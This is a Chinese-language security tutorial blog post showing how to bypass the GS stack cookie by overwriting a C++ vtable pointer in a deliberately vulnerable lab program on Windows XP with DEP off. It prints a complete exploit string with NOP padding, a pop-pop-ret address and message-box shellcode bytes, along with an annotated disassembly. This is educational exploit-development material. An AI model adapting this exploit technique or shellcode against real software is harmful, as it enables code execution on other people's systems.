淹没虚函数地址过GS保护（关闭DEP保护）

原创

极安御信安全研究院

发布于 2022-08-25 18:52:38

1.6K0

发布于 2022-08-25 18:52:38

文章被收录于专栏：极安御信安全研究院

作者:黑蛋

1.简介

针对缓冲区溢出覆盖函数返回地址这一特征，微软在编译程序时使用了一个安全编译选项--GS， Visual Studio 2003 (VS 7.0)及以后版本的 Visual Studio 中默认启用了这个编译选项。在所有函数调用时，会向栈中压入一个DWORD，他是data段第一个DWORD与EBP亦或之后形成的值，处于EBP+4的位置，在所有函数执行完返回时，会有一个检查函数，检测EBP+4的值是否和原来一样，一样则正常返回，反之进入异常处理流程，函数不会正常返回，这个操作叫 Security check，如果有缓冲区溢出函数返回值，势必会淹没Security Cookie，进入异常处理流程。如果我们在有GS保护的程序中使用栈溢出淹没返回地址EBP+4的位置，势必会破坏EBP-4的值，在函数返回之前经过Security check，会直接导致我们栈溢出淹没返回值失败，本篇通过调用c++虚函数在GS检查函数之前的特征，通过淹没虚函数地址，让虚函数地址指向我们的shellcode，达到绕过GS保护成功溢出的目的。详细了解GS保护机制可以参考《0day安全》这本书。

2.环境配置

环境	配置
操作系统	XP系统
编译器	vs2008
调试器	x32dbg

3.代码

#include "stdafx.h" #include "string.h" class GSVirtual { public : void gsv(char * src) { char buf[200]; strcpy(buf, src); bar(); } virtual void bar() { } }; int main() { GSVirtual test; test.gsv("\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x00"); return 0; }

这里我们首先给gsv函数传入一段正常的字符串0x90，便于我们第一次分析函数栈内情况。

4.项目配置如下（Win32,release）

第一步:打开项目属性-->配置属性-->C/C++-->代码生成-->运行时库-->多线程调试(/MTd); 第二步:打开项目属性-->配置属性-->C/C++-->代码生成-->缓冲区安全检查（GS）-->是；第三步:打开项目属性-->配置属性-->链接器-->高级-->数据执行保护（DEP）-->否；

5.代码介绍：

创建一个类对象，调用gsv函数，第一次传入199字节\x90,以\x00结尾，方便观察栈内情况；在gsv中有一个拷贝函数，下面紧接着调用一个虚函数；生成exe,拖入x32dbg，因为有符号文件，ctrl+g，输入main，定位到主函数（OD不行），下断点：

F9运行到断点处：

第一个call是创建类对象，第二个call是gsv函数，也就是我们重点观察目标，跟进第二个call，查看堆栈，转到EBP：

其中EBP+4是返回地址，EBP+8是我们传入200字节字符串地址，EBP+C是虚表地址，栈中0012FE8C指向buf，即EBP-D0

我们发现第二个call是GS安全检查函数，而第一个call，经过分析是调用虚函数，如果我们通过淹没虚函数地址，控制程序流程，就可以在GS检查前达到我们的目的，绕过GS保护。

划红线区域就是找虚表第一个虚函数的过程，发现是EBP+C地址指向的地址指向的地址是call eax中eax的值（这块需要仔细理解），所以我们需要控制EBP+C这个位置，查看堆栈情况

我们发现需要延长字符串32个字节，才可以淹没虚表地址，所以构造新的字符串：

test.gsv( "\xE0\x14\x92\x7C"//这是特意构造的四字节，稍后解释 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"/*这堆0x90是为了凑数，毫无意义，对应硬编码是nop，即滑板指令*/ "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x6F\x70\x20\x20\x68\x76\x75\x6C\x74\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8“/*这段是我们一个弹窗shellcode，效果是弹出一个框，如果程序弹框，证明我们栈溢出成功，并成功绕过GS保护*/ ”\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90“/*这段同样是凑数字节，没有意义*/ ”\x8C\xFE\x12\x00"/*覆盖虚表地址的四字节，同样是我们这段字符串在栈中的首地址*/ );

在这里，EBP+C指向的地址已经是我们buf的起始位置，当程序调用虚函数的时候，即call eax：

这里eax的值就是虚表地址，而我们通过淹没这个地址，现在eax指向我们shellcode的第一个四字节，所以这里我们shellcode第一个四字节应该是一个地址，然后程序流程会去执行我们shellcode第一个四字节指向的地方，我们在这里构造一个pop，pop，ret，通过俩次弹栈，让ESP指向我们shellcode第5个字节之后，（第一次是call eax，esp会压入返回值，第二个pop是我们shellcode的第一个四字节），之后ret会执行到esp指向的地方，即我们的弹窗shellcode的地方，达到目的。

下面是我shellcode第一个四字节指向的地方：

6.思考

(1)我们淹没的地址并不是虚函数地址，而是虚表地址，所以我们所淹没的值同样应该是一个地址，这个地址再指向一段程序； (2)既然我们需要shellcode前四个字节指向一段程序，为什么不直接指向下面的弹窗shellcode的位置，这是因为拷贝函数判断拷贝结束是看这个字节是否=\x00，而我们栈中的地址都是\x00开头，这样会导致拷贝终止，所以我们shellcode除了最后一个字节可以为\x00,其他地方均不得出现\x00，故而我们在程序中寻找不会出现\x00的地址，指向pop，pop，ret，达到控制程序流程到我们的shellcode的目的。

7.最后是我分析gsv函数的一个简单的分析注释：

地址	硬编码	汇编代码	注释
00401000	55	push ebp	gs_virtual.cpp:7
00401001	8BEC	mov ebp,esp
00401003	81EC E4000000	sub esp,E4
00401009	A1 20304200	mov eax,dword ptr ds:[<___security_cook	00423020 DATA段第一个四字节传到EAX
0040100E	33C5	xor eax,ebp	与EBP亦或成COOK
00401010	8945 FC	mov dword ptr ss:[ebp-4],eax	ebp-4=GS COOK
00401013	898D 2CFFFFFF	mov dword ptr ss:[ebp-D4],ecx	EBP-D4=虚函数地址
00401019	8B45 08	mov eax,dword ptr ss:[ebp+8]	EAX=字符串
0040101C	8985 28FFFFFF	mov dword ptr ss:[ebp-D8],eax	EDP-D8 = 字符串地址
00401022	8D8D 30FFFFFF	lea ecx,dword ptr ss:[ebp-D0]	返回到ntdll
00401028	898D 24FFFFFF	mov dword ptr ss:[ebp-DC],ecx	EBP-DC = 0012FE8C
0040102E	8B95 24FFFFFF	mov edx,dword ptr ss:[ebp-DC]
00401034	8995 20FFFFFF	mov dword ptr ss:[ebp-E0],edx	EBP-E0=0012FE8C
0040103A	8B85 28FFFFFF	mov eax,dword ptr ss:[ebp-D8]
00401040	8A08	mov cl,byte ptr ds:[eax]	CL=第一个字符
00401042	888D 1FFFFFFF	mov byte ptr ss:[ebp-E1],cl	EBP-E1 = CL
00401048	8B95 24FFFFFF	mov edx,dword ptr ss:[ebp-DC]	EDX = 0012FE8C
0040104E	8A85 1FFFFFFF	mov al,byte ptr ss:[ebp-E1]
00401054	8802	mov byte ptr ds:[edx],al	第一个字节复制到0012FE8C
00401056	8B8D 28FFFFFF	mov ecx,dword ptr ss:[ebp-D8]	ECX=字符串地址
0040105C	83C1 01	add ecx,1
0040105F	898D 28FFFFFF	mov dword ptr ss:[ebp-D8],ecx	EBP-D8=字符串数组+1
00401065	8B95 24FFFFFF	mov edx,dword ptr ss:[ebp-DC]	EDX = 0012FE8C
0040106B	83C2 01	add edx,1
0040106E	8995 24FFFFFF	mov dword ptr ss:[ebp-DC],edx	栈内存放字符串地址数组+1
00401074	80BD 1FFFFFFF 00	cmp byte ptr ss:[ebp-E1],0
0040107B	75 BD	jne gs_virtual.40103A
0040107D	8B85 2CFFFFFF	mov eax,dword ptr ss:[ebp-D4]
00401083	8B10	mov edx,dword ptr ds:[eax]
00401085	8B8D 2CFFFFFF	mov ecx,dword ptr ss:[ebp-D4]
0040108B	8B02	mov eax,dword ptr ds:[edx]
0040108D	FFD0	call eax	取虚函数地址CALL
0040108F	8B4D FC	mov ecx,dword ptr ss:[ebp-4]	gs_virtual.cpp:11
00401092	33CD	xor ecx,ebp
00401094	E8 57000000	call	GS安全检查函数
00401099	8BE5	mov esp,ebp
0040109B	5D	pop ebp
0040109C	C2 0400	ret 4